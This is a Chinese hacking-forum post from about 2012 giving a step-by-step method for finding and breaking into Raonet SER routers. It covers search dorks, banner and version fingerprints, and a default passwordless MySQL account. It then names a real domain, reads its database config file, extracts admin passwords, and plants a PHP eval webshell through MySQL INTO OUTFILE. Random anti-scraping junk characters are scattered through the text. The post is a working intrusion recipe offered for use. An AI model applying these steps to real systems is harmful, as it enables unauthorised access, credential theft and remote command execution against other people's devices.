寻找存在漏洞的路由器方法: n3 |/ z, ]1 t' [
: ^1 r9 f1 H0 j
1:google搜索'Raonet Subscriber Ethernet Router'4 n0 `* v4 y( |0 e# `. E. O
4 _% s5 I m' t# j) x; B9 m7 D
2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr2001* }- k5 s% R& W% r
( i0 e# X6 I0 ~$ S, P3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。
3 [! j% }, x. X; i
$ f% o( r0 F2 B# V+ O5 q//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......0 I9 z& u. i8 e$ O
) Z" a% E6 T. p) S
$ ]+ C$ |8 i- I! L% [
$ H& V! f1 ] S" E& C
入侵步骤:
! N# T3 Y2 R2 b
) F, g% q9 W2 Z$ O1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php
) c4 g) J0 a4 x4 |" e7 f5 G/ C# p' u' M% ~) K7 T
2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc5 S& p' v% b2 S2 a' m% d7 S
3:得到密码后连接,查看GUI管理密码:
! H# g3 ?* E1 y9 I4 B2 O' `use ser_500
; B% H" ~9 Y/ |3 A2 w4 Cselect id,passwd from user;
, x% ]0 d7 r1 _1 H( k4:通过数据库写入webshell,执行命令:6 W( G) F+ ^- v7 }4 O
use mysql;
: i7 a' O- S* {create table ok(cmd TEXT);
+ X0 p9 S \# ?& Z+ Hinsert into ok values("<?php @eval($_POST[cmd])?>");! I8 @8 w, u: s S) Q% F6 m
select * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";: |& a! Z3 E* M
drop table ok;
1 Q3 U5 x- K3 U5 k3 Z9 l" I4 }4 B8 m( `+ f6 z
5:连接后门shell.php
7 Q2 J# q3 c* K2 l$ P
& {: s+ s3 j1 x" r; T7 y; r/ @- G6. 搞定! a$ T# R0 _4 R4 P6 j- A' I) \
1 m% g7 X d: q* g9 P: h |
发表于 2012-12-10 10:30:18
收藏
支持
反对
发表于 2013-7-27 20:06:50